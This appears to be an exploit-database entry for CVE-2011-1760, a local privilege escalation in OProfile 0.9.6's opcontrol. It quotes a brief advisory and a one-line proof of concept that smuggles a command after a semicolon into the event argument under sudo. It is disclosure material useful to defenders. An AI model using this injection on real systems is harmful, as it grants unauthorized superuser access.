OProfile 0.9.6 - 'opcontrol' Utility 'set_event()' Local Privilege Escalation
| EKU-ID: 40281 | CVE: CVE-2011-1760;OSVDB-72792 | OSVDB-ID: |
| Author: Stephane Chauveau | Published: 2011-04-29 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 40281 | CVE: CVE-2011-1760;OSVDB-72792 | OSVDB-ID: |
| Author: Stephane Chauveau | Published: 2011-04-29 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/47652/info OProfile is prone to a local privilege-escalation vulnerability. An attacker can exploit this issue to run arbitrary commands with superuser privileges. The following example command is available: sudo opcontrol -e "abcd;/usr/bin/id"